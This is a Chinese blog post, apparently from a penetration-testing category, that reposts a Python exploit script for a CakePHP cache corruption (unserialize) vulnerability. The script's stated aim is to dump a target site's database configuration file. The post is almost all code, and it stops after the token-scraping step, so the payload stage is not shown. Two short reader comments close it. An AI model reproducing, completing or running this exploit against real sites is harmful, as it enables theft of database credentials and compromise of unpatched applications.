CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit


Apr 22 2015

CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit

首页 » 渗透编程 » CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit   


#!/usr/bin/python
#
# burnedCake.py - CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
# written by felix@malloc.im
#
# This code exploits a unserialize() vulnerability in the CakePHP security
# component. See http://malloc.im/CakePHP-unserialize.txt for a detailed
# analysis of the vulnerability.
#
# The exploit should work against every CakePHP based Application, that
# uses POST forms with security tokens and hasn't changed the Cache 
# configuration (file-system caching is standard). Exploiting
# other caching configurations is possible but not as elegant.
#
# This POC will output the database config file of the running CakePHP Application,
# other payloads are easily possibe with a changed PHP Code.

from optparse import OptionParser
from urlparse import urlparse,urljoin
import urllib2
import urllib
import re

def request(url,data="",headers={},debug=0):
    if (data==""):
        request = urllib2.Request(url=url,headers=headers)
    else:
        request = urllib2.Request(url=url,headers=headers,data=data)
        
    debug_handler = urllib2.HTTPHandler(debuglevel = debug)
    opener = urllib2.build_opener(debug_handler)
    response=opener.open(request)
    return response


if __name__=="__main__":

    parser = OptionParser(usage="usage: %prog [options] url") 
    parser.add_option("-p", "--post", dest="post",
                      help="additional post content as urlencoded string")
    parser.add_option("-v", action="store_true", dest="verbose", 
                      help="verbose mode")

    (options, args) = parser.parse_args()
    if len(args)!=1:
        parser.error("wrong number of arguments")
    if options.verbose:
        debug=1
    else: 
        debug=0
    if not options.post:
        options.post=""
    url=urlparse(args[0])
    html=request(url.geturl(),debug=debug ).read()

    try:
        key=re.search("data\[_Token\]\[key\]\" value=\"(.*?)\"",html).group(1)
        path=re.search('method="post" action="(.*?)"',html).group(1)
        fields=re.search('data\[_Token\]\[fields\]" value="([0-9a-f]{32}).*?"',html).group(1)
    except:
        print "[x] Regex failed! :("
        exit()
正文部分到此结束

文章标签: EXP cake

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «使用虚拟机对minidwep-gtk进行PIN破解 | Complex webshell manager, quasi-http botnet(webshell在线管理)»

已有2条评论

IT疯狂女

2015-04-22 16:45 沙发
完全看不懂的感觉

mOon

2015-04-22 18:17
@IT疯狂女:额擦 简单的exp